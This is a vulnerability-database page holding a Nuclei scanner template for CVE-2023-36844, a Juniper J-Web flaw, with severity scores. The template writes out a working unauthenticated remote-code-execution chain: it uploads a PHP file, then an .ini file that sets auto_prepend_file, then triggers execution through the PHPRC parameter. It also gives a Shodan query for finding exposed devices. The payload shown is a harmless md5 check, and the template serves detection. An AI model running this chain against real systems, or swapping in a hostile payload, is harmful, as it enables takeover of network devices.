Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-36844
HistoryAug 26, 2023 - 7:36 a.m.

Juniper Devices - Remote Code Execution

2023-08-2607:36:41
ProjectDiscovery
github.com
16
juniper
php
rce
packetstorm
fileupload
cve2023
intrusive

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.1 High

AI Score

Confidence

Low

0.967 High

EPSS

Percentile

99.6%

Multiple cves in Juniper Network (CVE-2023-36844CVE-2023-36845CVE-2023-36846CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
id: CVE-2023-36844

info:
  name: Juniper Devices - Remote Code Execution
  author: princechaddha,ritikchaddha
  severity: medium
  description: |
    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
  remediation: |
    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
    - https://supportportal.juniper.net/JSA72300
    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-36844
    cwe-id: CWE-473
    epss-score: 0.74086
    epss-percentile: 0.98118
    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: juniper
    product: srx100
    shodan-query: title:"Juniper Web Device Manager"
  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables:
  string: "CVE-2023-36844"
  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
      - |
        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"original_fileName":'
          - '"converted_fileName":'
        condition: and

      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        part: body_1
        name: phpfile
        regex:
          - "([a-f0-9]{64}\\.php)"
        internal: true

      - type: regex
        part: body_2
        name: inifile
        regex:
          - "([a-f0-9]{64}\\.ini)"
        internal: true
# digest: 490a00463044022050c0c86d37adc93f15483be39ba88b4ef0b2147733b63f599775bb98e8b82e5702202f3f2ce3ef76d2946847a13a8badb6ce89120b87a6559d7b4e4187a798e29c70:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.1 High

AI Score

Confidence

Low

0.967 High

EPSS

Percentile

99.6%